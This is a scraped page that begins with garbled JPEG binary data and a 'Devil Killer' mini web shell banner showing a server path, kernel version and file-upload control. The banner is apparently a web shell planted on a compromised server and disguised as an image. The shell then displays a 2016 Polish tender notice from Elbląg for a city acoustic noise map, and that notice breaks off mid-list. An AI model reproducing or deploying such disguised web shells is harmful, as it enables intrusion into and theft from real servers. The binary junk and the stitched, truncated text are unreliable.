JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161216/368582-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://um-elblag.samorzady.pl/kat/id/57' target='_blank'>http://um-elblag.samorzady.pl/kat/id/57</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 368582 - 2016
              z dnia 2016-12-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Elbląg: Wykonanie Mapy Akustycznej Miasta Elbląg oraz aktualizacja Programu ochrony środowiska przed hałasem dla miasta Elbląg<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina - Miasto Elbląg, krajowy numer identyfikacyjny
              170747715, ul.
              Łączności 
              1,
              82-300 
              Elbląg, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              552353536, e-mail
              rzp@umelblag.pl, faks
              552393334.
              <br />
              Adres strony internetowej (URL): www.umelblag.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://um-elblag.samorzady.pl/kat/id/57</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://um-elblag.samorzady.pl/kat/id/57</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty składa się pod rygorem nieważności w formie pisemnej. <br />
                Adres:
                <br />Urząd Miejski w Elblągu, Referat Zamówień Publicznych pokój 403, 82-300 Elbląg, ul. Łączności 1</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie Mapy Akustycznej Miasta Elbląg oraz aktualizacja Programu ochrony środowiska przed hałasem dla miasta Elbląg<br /><b>Numer referencyjny: </b>RZP.271.87.2016.AŁ<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiot zamówienia:
Wykonanie Mapy Akustycznej Miasta Elbląg oraz aktualizacja Programu ochrony środowiska przed hałasem dla miasta Elbląg
Przedmiot główny:
CPV: 90.74.22.00-2
Nazewnictwo wg CPV: Usługi w zakresie ochrony przed hałasem
Przedmiotem zamówienia jest wykonanie Mapy Akustycznej Miasta Elbląg zwanej dalej MAPĄ na podstawie warstw tematycznych, udostępnionych przez Zamawiającego oraz przedstawienie wyników prac związanych z ww. mapą na stronach internetowych Urzędu Miejskiego oraz aktualizacja Programu ochrony środowiska przed hałasem dla miasta Elbląg, przyjętego Uchwałą nr 625/2013  pełniącego funkcje organów Miasta Elbląg działającego za Radę Miejską z dnia 18.06.2013 r., zwanego dalej PROGRAMEM.
Główne miejsce świadczenia Usług: Gmina Miasto Elbląg.
2.	Przedmiot zamówienia dotyczy terenu zawartego wewnątrz granic administracyjnych miasta Elbląg o powierzchni 7 982 ha rozszerzonego o pas szerokości 300m, bezpośrednio przylegający do zewnętrznych granic miasta, o ile występują w nim źródła hałasu mające istotny wpływ na klimat akustyczny na granicy miasta.
3.	Zakres zamówienia:
Zamówienie obejmuje:
a)	wykonanie MAPY, z zastosowaniem metod zalecanych przez Dyrektywę 2002/49/WE Parlamentu Europejskiego i Rady z dnia 25 czerwca 2002 r. odnoszącą się do oceny i zarządzania poziomem hałasu w środowisku,
b)	przygotowanie i wdrożenie informatycznego modułu trójwymiarowej mapy akustycznej do serwisu mapowego, zwanego dalej KOMPONENTEM, który będzie wyświetlał, przesuwał, zbliżał i obracał w dowolnym kierunku trójwymiarowy model miasta z nałożonymi wartościami hałasu dla fasad wszystkich budynków, wraz z możliwością odczytu wartości poziomu hałasu w miejscu wskazanym na fasadzie budynku lub powierzchni terenu,
c)	przeszkolenie i wdrożenie pracowników Zamawiającego w użytkowanie MAPY i posługiwanie się oprogramowaniem CadnaA, zwane dalej WDROŻENIEM,
d)	 aktualizację PROGRAMU przyjętego Uchwałą nr 625/2013 pełniącego funkcje organów Miasta Elbląg działającego za Radę Miejską z dnia 18.06.2013 r., 
e)	zapewnienie udziału społeczeństwa, zwanego dalej KONSULTACJAMI, wraz z opracowaniem Raportu zwanego dalej RAPORTEM,
f)	prezentację projektu MAPY na komisji, która będzie odbierała przedmiot zamówienia, na naradzie kierowniczej Urzędu Miejskiego w Elblągu, w terminie/terminach wskazanych przez Zamawiającego, udzielanie wyjaśnień w terminie/terminach wskazanych przez Zamawiającego,
g)	prezentację projektu PROGRAMU na naradzie kierowniczej Urzędu Miejskiego w Elblągu i na posiedzeniach komisji Rady Miejskiej oraz na posiedzeniu sesji Rady Miejskiej, w której porządku obrad zostanie umieszczona sprawa uchwalenia PROGRAMU w terminach wskazanych przez Zamawiającego, udzielanie wyjaśnień w terminie/terminach wskazanych przez Zamawiającego,
h)	dokonanie ewentualnych zmian w opracowaniu wynikających z przyjętych uwag zgłoszonych na etapie prezentacji przedmiotu umowy,
i)	wykonanie sprawozdań do Komisji Europejskiej, zwanych dalej SPRAWOZDANIAMI.
4.	Ogólne warunki zamówienia:
4.1.	Opracowanie MAPY oraz PROGRAMU należy wykonać wykorzystując dane:
1)	zawarte w istniejącym systemie MAPY, w skład którego wchodzą:
-	kompleksowy system umożliwiający analizę i modelowanie stanu akustycznego środowiska na obszarze miasta Elbląg,
-	mapy emisyjne oddzielnie dla poszczególnych źródeł hałasu (drogowego, tramwajowego, kolejowego, przemysłowego),
-	mapy imisyjne oddzielnie dla poszczególnych źródeł hałasu (drogowego, tramwajowego, kolejowego, przemysłowego),
-	mapa wrażliwości hałasowej,
-	mapa terenów zagrożonych hałasem,
-	mapa pokazująca liczbę osób zagrożonych hałasem,
-	mapa zagrożeń specjalnych,
-	mapa obszarów cichych,
-	mapa przedstawiająca przewidywane rezultaty działań,
-	wykresy pokazujące stan środowiska akustycznego.
2)	zawarte w PROGRAMIE, przyjętym Uchwałą nr 625/2013 pełniącego funkcje organów Miasta Elbląg działającego za Radę Miejską  z dnia 18.06.2013 r. 
3)	nowe dane, obliczenia i analizy pozyskane w ramach realizacji aktualnej edycji mapy oraz programu.
4.2.	Wykonawca jest zobowiązany wykonać na podstawie tych danych nowe opracowanie MAPY, a następnie aktualizację PROGRAMU.
4.3.	Przedmiot zamówienia należy wykonać na podstawie i zgodnie z obowiązującymi przepisami, w tym w szczególności:
-	Dyrektywą 2002/49/WE Parlamentu Europejskiego i Rady z dnia 25 czerwca 2002 r. odnoszącą się do oceny i zarządzania poziomem hałasu w środowisku,
-	Ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (t.j. Dz. U. 2016 poz. 672 z późn. zm.),
-	Ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. 2016 poz. 353 z późn. zm.),
-	Rozporządzeniem Ministra Środowiska z dnia 1 października 2007 r. w sprawie szczegółowego zakresu danych ujętych na mapach akustycznych oraz ich układu i sposobu prezentacji (Dz. U. z 2007 r., Nr 187, poz. 1340),
-	Rozporządzeniem  Ministra Środowiska z dnia 14 października 2002 r. w sprawie szczegółowych wymagań, jakim powinien odpowiadać program ochrony środowiska przed hałasem (Dz. U. 2002 r., Nr 179, poz. 1498),
-	Rozporządzeniem Ministra Środowiska z dnia 14 czerwca 2007 r. w sprawie dopuszczalnych poziomów hałasu w środowisku (t.j. Dz. U. 2014 r. poz. 112),
-	Rozporządzeniem Ministra Środowiska z dnia 10 listopada 2010 r. w sprawie sposobu ustalania wartości wskaźnika hałasu LDWN  (Dz. U. z 2010 r., Nr 215, poz. 1414),
-	Rozporządzeniem Ministra Środowiska z dnia 30 października 2014 r. w sprawie wymagań w zakresie prowadzenia pomiarów wielkości emisji oraz pomiarów ilości pobieranej wody (Dz. U. 2014 r. poz. 1542),
-	Rozporządzeniem Ministra Środowiska z dnia 16 czerwca 2011 r. w sprawie wymagań w zakresie prowadzenia pomiarów poziomów substancji lub energii w środowisku przez zarządzającego drogą, linią kolejową, linią tramwajową, lotniskiem lub portem (Dz. U. z 2011 r., Nr 140, poz. 824 z późn. zm.).
-	Ustawą z dnia 17.05.1989 r. Prawo geodezyjne i kartograficzne (t.j. Dz. U. 2016 poz. 1629),
W przypadku zmiany powyższych aktów prawnych w trakcie prac nad realizacją etapu I i II zamówienia, Wykonawca w ramach niniejszego zamówienia zastosuje zmienione przepisy.
4.4.	Przedmiot zamówienia należy wykonać w następujący sposób:
1)	Etap I - wykonanie MAPY  w terminie do dnia 30 czerwca 2017 r.
2)	Etap II - wykonanie aktualizacji PROGRAMU  w terminie do 29 czerwca 2018 r.
3)	Wykonawca na wniosek Zamawiającego przez okres 5 lat od daty odbioru Etapu I będzie opracowywać SPRAWOZDANIA zgodnie z art. 10 ust. 2 dyrektywy 2002/49/WE Parlamentu Europejskiego i Rady z dnia 25 czerwca 2002 r. odnoszącej się do oceny i zarządzania  poziomem hałasu w środowisku.
4)	Wykonawca na wniosek Zamawiającego przez okres 5 lat od daty odbioru Etapu II do czasu wymaganej ustawą Prawo ochrony środowiska aktualizacji PROGRAMU będzie opracowywać SPRAWOZDANIA, o ile będą wymagane.
5.	Wykonanie MAPY:
5.1.	Wymagania metodyczne dla MAPY:
1)	MAPA będzie stanowić integralną część Elbląskiego Systemu Informacji Przestrzennej (ESIP) funkcjonującego w Elblągu. Przez integralną część należy rozumieć możliwość dodania wszystkich warstw opracowanej MAPY  bez utraty parametrów opisowych  do istniejących warstw systemu ESIP.
2)	Przedmiot zamówienia należy zrealizować w środowisku zgodnym z programem, będącym w posiadaniu Zamawiającego: CadnaA 32bit, wersja 4.2. firmy DataKustik GmbH.
3)	Wykonawca zrealizuje serię badań i pomiarów obciążenia akustycznego na terenie Miasta Elbląg, w następujący sposób:
a)	Pomiary natężenia ruchu drogowego:
Pomiary natężenia i struktury ruchu drogowego muszą obejmować:
-	24-godzinne pomiary struktury rodzajowej i czasowej ruchu w co najmniej 60 reprezentatywnych przekrojach, w lokalizacjach wskazanych przez Zamawiającego,
-	średnie dla roku natężenie ruchu oddzielnie dla pory dziennej, wieczorowej i nocnej,
-	strukturę ruchu (procentowy udział samochodów ciężarowych o ciężarze większym   od 3,5 t dla ww. pór doby),
-	średnią prędkość pojazdów osobowych,
-	średnią prędkość pojazdów ciężarowych,
-	rodzaj ruchu (jednostajny, niejednostajny, pulsujący) o stałej w przybliżeniu prędkości średniej,  niejedostajny z hamowaniem, niejednostajny z przyspieszeniem.
Dla wyodrębnionych odcinków- Wykonawca przekrojów musi wyznaczyć następujące   parametry:
- położenie osi jezdni,
- szerokość jezdni,
- rodzaj nawierzchni,
- nachylenie (np. automatycznie z rzeźby terenu),
- lokalizacja sygnalizacji świetlnej
b)	Pomiary weryfikacyjne poziomu hałasu drogowego:
Pomiary weryfikacyjne poziomu hałasu w środowisku, pochodzącego z pasa drogowego należy przeprowadzić w co najmniej 30 punktach pomiarowych. Lokalizację punktów pomiarowych należy przedstawić do akceptacji Zamawiającemu.
c)	Pomiary weryfikacyjne poziomu hałasu kolejowego:
Pomiary weryfikacyjne poziomu hałasu w środowisku, pochodzącego od ruchu kolejowego z uwzględnieniem przejazdów różnych typów pociągów należy wykonać w co najmniej 5 punktach pomiarowych. Lokalizację punktów pomiarowych należy przedstawić do akceptacji Zamawiającemu.
d)	Pomiary weryfikacyjne poziomu hałasu tramwajowego:
Pomiary weryfikacyjne poziomu hałasu w środowisku, pochodzącego od ruchu tramwajowego z uwzględnieniem przejazdów różnych typów pojazdów tramwajowych należy wykonać w co najmniej 5 punktach pomiarowych. Lokalizację punktów pomiarowych należy przedstawić do akceptacji Zamawiającemu.
e)	Pomiary weryfikacyjne poziomu hałasu przemysłowego:
Pomiary weryfikacyjne poziomu hałasu w środowisku, pochodzącego od źródeł przemysłowych należy wykonać w co najmniej 5 punktach pomiarowych. Ponadto należy wykonać niezbędną ilość pomiarów hałasu przemysłowego konieczną do wyznaczenia danych wejściowych do modelowania źródeł hałasu przemysłowego.   
4)	Metody obliczeniowe oceny hałasu winny być wykonane zgodnie z następującymi zaleceniami metodycznymi:
a)	dla hałasu drogowego - metoda francuska NMPB-Routes-96 (SETRA-CERTU-LCPC-CSTB) oraz francuska norma XPS 31-133, zgodnie z Dyrektywą 2002/49/WE, przy założeniu walidacji pomiarami hałasu w terenie,
b)	dla hałasu szynowego  holenderska krajowa metoda obliczania opublikowana w Reken-en Meetvoorschrift Railverkeerslawaai 96. Ministerie Volkshuisvesting. Ruimtelijke Ordening en Milieubeheer, 20 listopada 1996 r., dopuszczalne wykorzystanie pomocniczo normy niemieckiej Schall03, przy założeniu walidacji pomiarami hałasu w terenie,
c)	dla hałasu przemysłowego  zgodnie z normą ISO 9613-2, przy założeniu walidacji pomiarami hałasu w terenie,
5)	Dodatkowo Wykonawca uwzględni zalecenia zawarte w Wytycznych opracowania map akustycznych opracowanych przez Główny Inspektorat Ochrony Środowiska (Warszawa, 2016 r.).
6)	W przypadku zmiany Wytycznych, o których mowa w ppkt 5. Wykonawca uwzględni w niniejszym zamówieniu zmienione zalecenia, o ile będą one obowiązywały od tego mapowania akustycznego.
5.2.	KOMPONENT - szczegółowy opis:
1)	Wykonawca ma przygotować i wdrożyć KOMPONENT, który będzie wyświetlał, przesuwał, zbliżał i obracał w dowolnym kierunku trójwymiarowy model miasta z nałożonymi wartościami hałasu dla wszystkich budynków a także musi umożliwiać oglądanie rozkładu wszystkich rodzajów hałasu na elewacjach pojedynczych budynków chronionych akustycznie.
2)	KOMPONENT musi umożliwiać wyświetlenie bryły budynku z każdej strony, z możliwością obracania wokół dowolnej osi za pomocą strzałek nawigacyjnych lub kursora myszy.
3)	KOMPONENT musi umożliwiać odczyt danych geometrycznych bryły budynku.
4)	KOMPONENT musi umożliwiać odczytanie wartości poziomu dźwięku na każdej wysokości na elewacji budynku.
5)	KOMPONENT musi umożliwiać włączanie i wyłączanie poszczególnych rodzajów hałasu na elewacjach.
6)	Bryły budynków będą ładowane w przeglądarce internetowej w osobnym oknie po kliknięciu na pojedynczy obiekt (budynek) na mapie.
7)	Bryła budynku ma być wyświetlana na tle fragmentu ortofotomapy.
8)	KOMPONENT musi zostać dostarczony i zainstalowany u Zamawiającego.
9)	KOMPONENT musi pracować w najpopularniejszych przeglądarkach internetowych tj. Internet Explorer od wersji 9, Firefox od wersji 3.6, Opera od wersji 10, Chrome od wersji 9.
10)	Korzystanie z KOMPONENTU nie powinno wymuszać instalacji dodatkowych elementów na komputerach użytkowników.
5.3.	Dane wyjściowe dla opracowania MAPY, które udostępni Zamawiający:
1)	Zamawiający udostępni Wykonawcy:
a)	Numeryczny Model Terenu Miasta Elbląg w układzie współrzędnych płaskich  prostokątnych PUWG 2000 S7 oraz w układzie wysokościowym Kronsztadt 86, w formacie danych CAD-dxf oraz pliki ASCII XYZ zawierające numeryczny model terenu w strukturze GRID o oczku 1m;
b)	ortofotomapę Miasta Elbląg w formacie TIFF i w formacie HMR  w kompozycjach barwnych RGB i CIR o pikselu terenowym  0,05 i 0,15 (w zależności od strefy opracowania), w układzie współrzędnych płaskich  prostokątnych PUWG 2000 S7, aktualność 2014;     
c)	dane graficzne i opisowe znajdujące się w Elbląskim Systemie Informacji Przestrzennej (ESIP). Dane  graficzne w postaci cyfrowej mogą zostać wydane w formacie dxf lub gml. Dane opisowe obiektów są w bazie MS SQL. Informacje zawierają następujące warstwy tematyczne: 
	drogi
	koleje
	tramwaje
	budynki
	topografia
	tereny zielone
	parkingi
	przemysł
	użytkowanie terenu
	dane punktów adresowych (położenie oraz dane adresowe) 
	plany zagospodarowania przestrzennego 
d)	dane źródłowe zawarte w istniejącej MAPIE, obejmującej:
	mapę emisyjną hałasu drogowego
	mapę emisyjną hałasu kolejowego
	mapę emisyjną hałasu tramwajowego
	mapę emisyjną hałasu przemysłowego
	mapę imisyjną hałasu drogowego,
	mapę imisyjną hałasu kolejowego,
	mapę imisyjną hałasu tramwajowego,
	mapę imisyjną hałasu przemysłowego,
	mapę wrażliwości hałasowej,
	mapę terenów zagrożonych hałasem,
	mapę zagrożeń specjalnych,
	mapę obszarów cichych,
	mapę przedstawiającą przewidywane rezultaty działań,
	wykresy pokazujące stan środowiska akustycznego.
2)	Pozostałe informacje przydatne do wykonania MAPY Wykonawca pozyska we własnym zakresie.
3)	Istnieje możliwość udostępnienia danych z państwowego zasobu geodezyjnego i kartograficznego - numerycznej mapy zasadniczej Miasta Elbląg oraz mapy ewidencji gruntów i budynków za odpłatnością. Opłata naliczana jest zgodnie z rozporządzeniem Ministra Administracji i Cyfryzacji z dnia 09 lipca 2014 r. w sprawie udostępniania materiałów państwowego zasobu geodezyjnego i kartograficznego, wydawania licencji  oraz wzoru Dokumentu Obliczenia Opłaty (Dz.U. 2014.917).
5.4.	Dane do uzupełnienia przez Wykonawcę
Obowiązkiem Wykonawcy jest pozyskanie własnym staraniem, zebranie, weryfikacja i aktualizacja danych oraz wykonanie pomiarów akustycznych i nieakustycznych niezbędnych do wykonania MAPY. Wykonawca wykorzysta do tworzenia Mapy Akustycznej dostarczone przez Zamawiającego warstwy tematyczne oraz przygotuje pozostałe warstwy, niezbędne do wykonania MAPY. Warstwy winny powstać w formie graficznej i tabelarycznej z opisem.
1)	Warstwa topografii terenu:
Warstwę topografii terenu należy stworzyć na podstawie przekazanych danych i uzupełnić je we własnym zakresie, o ile ich jakość nie będzie wystarczająca do poprawnych obliczeń map akustycznych.
2)	Warstwa dróg:
Wszystkie uwzględniane w MAPIE drogi (ulice) należy podzielić na odpowiednie odcinki, lub w przypadku drogi o kilku jezdniach na odcinki jezdni, dla których wszystkie parametry decydujące o poziomie hałasu są w przybliżeniu stałe.
Dla tak wyodrębnionych odcinków muszą być znane następujące parametry:
-	położenie osi jezdni,
-	szerokość jezdni,
-	rodzaj nawierzchni,
-	nachylenie (może być odczytane automatycznie z rzeźby terenu),
-	lokalizacja sygnalizacji świetlnej.
Ponadto niezbędne są następujące dane dotyczące ruchu parametrów:
-	średnie dla roku natężenie ruchu oddzielnie dla pory dziennej, wieczorowej i nocnej,
-	struktura ruchu (procentowy udział samochodów ciężarowych o ciężarze większym   od 3,5 t dla ww. pór doby),
-	średnia prędkość pojazdów osobowych,
-	średnia prędkość pojazdów ciężarowych,
-	rodzaj ruchu (jednostajny, niejednostajny, pulsujący) o stałej w przybliżeniu prędkości średniej, niejedostajny z hamowaniem, niejednostajny z przyspieszeniem.
3)	Warstwa z informacją o trasach komunikacji tramwajowej
Najmniejszym elementem uwzględnionym w obliczeniach do MAPY jest odcinek linii tramwajowej, reprezentowany przez odcinek trasy, lub w przypadku trasy wielotorowej, odcinek toru, dla którego muszą być znane następujące parametry:
-	położenie osi każdego istotnego toru trasy tramwajowej- geometria nasypu lub wgłębienia, tor zabudowany w jezdni, czy na wyodrębnionym torowisku,
-	rodzaj podłoża oraz sposób mocowania szyn do podłoża względnie podkładów (jeśli występują),
-	dokładna lokalizacja współrzędnej (wysokość) górnej powierzchni szyn,
-	nachylenie (może być odczytane automatycznie z rzeźby terenu),
-	rodzaj i stan techniczny szyn (systematycznie szlifowane, nieszlifowane) oraz podkładów,
-	sposób łączenia szyn (spawanie, skręcanie),
-	liczba połączeń na 100 m toru (jeśli występują),
